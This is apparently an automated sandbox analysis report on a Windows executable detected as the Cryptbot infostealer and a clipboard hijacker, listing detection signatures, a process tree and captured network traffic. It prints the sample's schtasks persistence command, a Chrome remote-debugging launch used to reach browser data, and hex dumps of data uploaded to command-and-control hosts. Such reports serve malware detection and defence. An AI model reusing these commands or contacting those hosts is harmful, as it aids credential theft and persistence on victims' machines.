Edit tour

Windows Analysis Report
SwJD3kiOwV.exe

Overview

General Information

Sample name:	SwJD3kiOwV.exe renamed because original name is a hash value
Original sample name:	cbb6759a3eb582b7a659ebe3bee1ddab.exe
Analysis ID:	1578085
MD5:	cbb6759a3eb582b7a659ebe3bee1ddab
SHA1:	52fd831761fddd95755e89fa4289ef4df1eb2915
SHA256:	6475a7d9465487089c2e20ed7c60efa9cb27a6fa86bbd20454152b773b7021ff
Tags:	exeuser-abuse_ch
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Attempt to bypass Chrome Application-Bound Encryption

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found stalling execution ending in API Sleep call

Hides threads from debuggers

Leaks process information

Machine Learning detection for sample

PE file contains section with special chars

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Detected potential crypto function

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

SwJD3kiOwV.exe (PID: 5408 cmdline: "C:\Users\user\Desktop\SwJD3kiOwV.exe" MD5: CBB6759A3EB582B7A659EBE3BEE1DDAB)

chrome.exe (PID: 7500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2328,i,18314253057255408516,4611028150433437333,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

service123.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: 110FE44D33E426703CD712E879D34CBC)

schtasks.exe (PID: 4008 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 6128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 1200 MD5: C31336C1EFC2CCB44B4326EA793040F2)

service123.exe (PID: 5212 cmdline: C:\Users\user~1\AppData\Local\Temp\/service123.exe MD5: 110FE44D33E426703CD712E879D34CBC)

service123.exe (PID: 4040 cmdline: C:\Users\user~1\AppData\Local\Temp\/service123.exe MD5: 110FE44D33E426703CD712E879D34CBC)

service123.exe (PID: 7776 cmdline: C:\Users\user~1\AppData\Local\Temp\/service123.exe MD5: 110FE44D33E426703CD712E879D34CBC)

service123.exe (PID: 7576 cmdline: C:\Users\user~1\AppData\Local\Temp\/service123.exe MD5: 110FE44D33E426703CD712E879D34CBC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: service123.exe PID: 5576	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
15.2.service123.exe.6c9c0000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SwJD3kiOwV.exe", ParentImage: C:\Users\user\Desktop\SwJD3kiOwV.exe, ParentProcessId: 5408, ParentProcessName: SwJD3kiOwV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 4008, ProcessName: schtasks.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\SwJD3kiOwV.exe", ParentImage: C:\Users\user\Desktop\SwJD3kiOwV.exe, ParentProcessId: 5408, ParentProcessName: SwJD3kiOwV.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7500, ProcessName: chrome.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SwJD3kiOwV.exe", ParentImage: C:\Users\user\Desktop\SwJD3kiOwV.exe, ParentProcessId: 5408, ParentProcessName: SwJD3kiOwV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 4008, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T08:47:46.425400+0100	2054350	1	A Network Trojan was detected	192.168.2.7	49765	194.87.47.113	80	TCP
2024-12-19T08:47:48.611484+0100	2054350	1	A Network Trojan was detected	192.168.2.7	49772	194.87.47.113	80	TCP
2024-12-19T08:47:57.630758+0100	2054350	1	A Network Trojan was detected	192.168.2.7	49804	194.87.47.113	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SwJD3kiOwV.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: SwJD3kiOwV.exe	Virustotal: Detection: 50%			Perma Link
Source: SwJD3kiOwV.exe	ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SwJD3kiOwV.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_001C15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		15_2_001C15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9C14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		15_2_6C9C14B0

Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_6a19a536-4

Source: SwJD3kiOwV.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\.ms-ad\	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\Google\	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	15_2_001C81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	15_2_6CA3AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	15_2_6CA3AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	15_2_6CA3AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	15_2_6C9E0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	15_2_6C9EA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	15_2_6C9EA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	15_2_6C9EA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6CA9F960h	15_2_6C9DEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	15_2_6CA684A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	15_2_6C9E4453
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	15_2_6C9EA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	15_2_6C9EA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	15_2_6C9EA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	15_2_6C9EC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	15_2_6C9EE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	15_2_6C9EE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	15_2_6CA60730
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	15_2_6C9E0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	15_2_6CA3C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	15_2_6CA3C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	15_2_6CA1A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	15_2_6C9E0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6CA9D014h]	15_2_6CA94360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	15_2_6CA3BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	15_2_6CA37D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	15_2_6CA33840
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	15_2_6C9ED974
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	15_2_6C9FBBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	15_2_6C9FBBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	15_2_6CA19B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	15_2_6CA3B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	15_2_6C9ED504
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6CA9DFF4h	15_2_6CA33690
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	15_2_6CA39600
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	15_2_6C9ED674
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	15_2_6C9ED7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	15_2_6C9DB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	15_2_6CA63140
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	15_2_6C9ED2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	15_2_6CA57350

Source: chrome.exe

Memory has grown: Private usage: 8MB later: 28MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49765 -> 194.87.47.113:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49772 -> 194.87.47.113:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49804 -> 194.87.47.113:80

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: /Content-Type: application/jsonContent-Length: 559914Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 34 34 33 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic	HTTP traffic detected: GET /WEIsmPfDcpBFJozngnYN1734366322?argument=HiGGHEFEglYCz76g1734594439 HTTP/1.1Host: home.twentytk20pn.topAccept: /
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20pn.topAccept: /Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------TisMAZIelaYgzj57pP66pHData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 54 69 73 4d 41 5a 49 65 6c 61 59 67 7a 6a 35 37 70 50 36 36 70 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 6f 6d 6f 78 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 19 67 35 71 57 b4 17 45 dc 54 6a 68 5e 99 83 bd ef 04 19 50 30 e6 03 e1 3b 19 5e 71 d1 8a bb 59 84 e7 42 54 da e0 35 db 11 75 f2 60 1e 33 3b 54 cd 3d 82 19 89 22 5e c5 f3 23 22 0f 49 30 9d ab 70 15 53 4f 3b 94 40 ac 16 a3 db 9e 8d e0 7a 6e a8 5f 65 e4 25 79 85 8c 69 e5 3a e4 31 38 be cb a2 d1 c8 85 b5 d3 dd 9d 25 75 97 55 4d ff ed cb b8 fa ff 14 d3 ca 58 bc 23 b6 7b 7a fa 6c 39 9d 0f 7b 52 51 99 8b fd 61 a1 7a a8 41 90 1a 27 6e d1 2b 09 19 cf 1b 5b d4 0c dd 53 3e bd 97 bd 0c b0 84 01 18 47 cf bd 3b d7 8d 70 46 0c b3 de 9f bf f9 57 54 c7 c6 64 83 b4 81 a3 bd a8 87 bf 94 3a b3 ee 7c 93 67 91 c7 bc 52 cd a1 c5 5d 27 ff f0 5a 96 3d b3 7d 89 63 79 b7 9c b0 78 fe 47 b6 90 84 ef 87 3c 4b 6c 91 33 4e b1 51 15 e1 09 a8 d3 f9 b1 f5 30 13 b6 c2 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 54 69 73 4d 41 5a 49 65 6c 61 59 67 7a 6a 35 37 70 50 36 36 70 48 2d 2d 0d 0a Data Ascii: --------------------------TisMAZIelaYgzj57pP66pHContent-Disposition: form-data; name="file"; filename="Hiwomox.bin"Content-Type: application/octet-streamg5qWETjh^P0;^qYBT5u`3;T="^#"I0pSO;@zn_e%yi:18%uUMX#{zl9{RQazA'n+[S>G;pFWTd:\|gR]'Z=}cyxG<Kl3NQ0--------------------------TisMAZIelaYgzj57pP66pH--
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20pn.topAccept: /Content-Length: 95424Content-Type: multipart/form-data; boundary=------------------------lryIJqtr6LAdfXkf877zhfData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6c 72 79 49 4a 71 74 72 36 4c 41 64 66 58 6b 66 38 37 37 7a 68 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 65 78 65 7a 75 68 65 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 6d fd c4 f8 1d 4d 74 55 1e 50 60 ba 4f 9d b9 59 ac 58 02 e7 47 50 89 d6 18 cb 3f df 9e ae 1a 23 36 11 c6 f9 05 58 dc a0 04 e8 74 49 43 ff c7 f3 f6 cc 03 ef 7d 92 3d 82 b6 99 7e 05 7b 64 d7 ea 04 5c c1 75 ef 06 20 e2 d9 21 e9 45 8b 95 82 7f 47 9f 9e c9 62 ec fe 52 4e cb 4c 84 8b 1f a8 03 87 93 63 6d e6 f9 d2 c9 56 e3 0e 04 29 56 e2 cf 04 73 bf aa d9 b4 69 2d ea 63 86 58 4b e8 f0 3d 2f ea 23 9b 3e 34 9d 0e 89 97 e5 df a4 66 83 a2 51 08 0b fa 4e 1c b4 6c fb a0 fd 7d 9b 2e 45 19 f9 d6 5f b9 30 46 17 09 5c c3 47 2d fc 01 12 86 56 c1 73 6c 9f 1e 48 fa 94 4c 8f 3c c2 0a 37 1d f3 42 96 f2 b1 9f 5b df db 52 00 a7 54 ad a7 ae 7c 89 dc cf 5a 45 e5 fe d9 21 be 1f 47 c9 b8 af e5 b5 41 8f 99 8e d0 82 29 13 9b c3 51 94 3b af 1b 02 b2 77 df d4 aa e4 a3 a6 33 f8 d3 6c 9d 89 a7 3e 01 b2 48 d4 4d 66 33 f3 ea 9c db 7b 48 47 db 40 9c c7 8a 26 49 c8 1d 83 3b b8 ee 61 84 b8 c3 05 0e e5 4e ea 9f 6d 2a bc 8c fd f2 b5 df 20 bf 0c a6 d2 8a ee 61 07 9b 9d 52 6f 97 b9 a6 e2 ac 58 91 c7 a6 60 71 0b bb ff d8 57 fe e1 37 37 36 64 61 ce 2d c0 9b a4 bf 1c 43 38 17 0b 38 d6 c4 b4 d6 8d 3d f9 5c 68 c8 ef f8 10 2d 42 d6 6f 2a fb 08 0c c8 16 0b 38 fc 23 d7 03 b1 d9 88 9c eb 05 d7 ed 79 70 3f a0 fc 39 3b 73 3c a2 ca fe 1d 4f d3 7d 80 3e 87 f9 7e 4b be 1d a7 3b 93 f4 5b d7 c6 8f 8f 04 03 9b 1e 97 d3 c1 f5 b8 30 54 85 7e 36 37 69 b9 72 cd 59 b6 9c c9 34 c7 59 ec 9e 96 58 0a ab f1 36 8e e8 0f 3c a7 44 2d f9 63 19 48 ec fc 3b 57 04 f9 f8 da 08 58 39 c4 2a 15 96 c4 29 12 c5 60 49 d0 57 0e f6 91 6f 94 ee 84 9e 1f a5 ea 2e ba 5a 3a d8 ac 30 db 19 6e dd b2 a2 ee 8e da 8c b8 78 3a b9 7d 16 e3 91 53 fe df ca a5 c5 42 58 e6 2f c8 72 4b ac 56 10 24 a8 b3 92 c0 19 84 16 53 f6 20 e5 38 05 f0 2c 12 4a 4a b4 ba 89 df 3d da 59 28 0e 8c 62 0f b3 72 b5 8f 5d d6 68 35 a1 75 ee 3b 7f a7 56 db ff 0f 0e f7 19 b9 e2 cc 86 10 50 1d 01 3a 45 d9 b1 2f 6d 8a 7d 8c e2 58 5e 72 8a bc 9e a4 a5 63 67 9e 43 2c 07 3d b1 f5 5b ac a1 0c be 99 5b 8c e8 1c e5 20 03 2b 18 ed bb 04 4a 21 00 31 cb e4 29 06 63 98 c2 01 25 a9 b7 ac 47 b9 e3 68 c5 b1 b4 a9 0a 8d 48 02 4a 0e cb 2d 4b 33 86 eb 6c 81 a5 1e 83 88 4e 8c db 5f c3 3e 2a 9a f3 07 2e 7a d8 83 37 6b 5d 0c 0f 75 4b 0a e5 26 d9 51 69 57 e2 bc 07 4f 9f db 5d 32 7b 79 3b 78 b3 c9 d2 23 0a 0d 0b 2a a4 3d 66 4d 5f ff cb fc 01 08 39 08 4c 6c 38 ce ca 99 e5 58 2e 20 2a 9a f7 51 25 00 a3 81 b4 6c 84 98 81 df f5 03
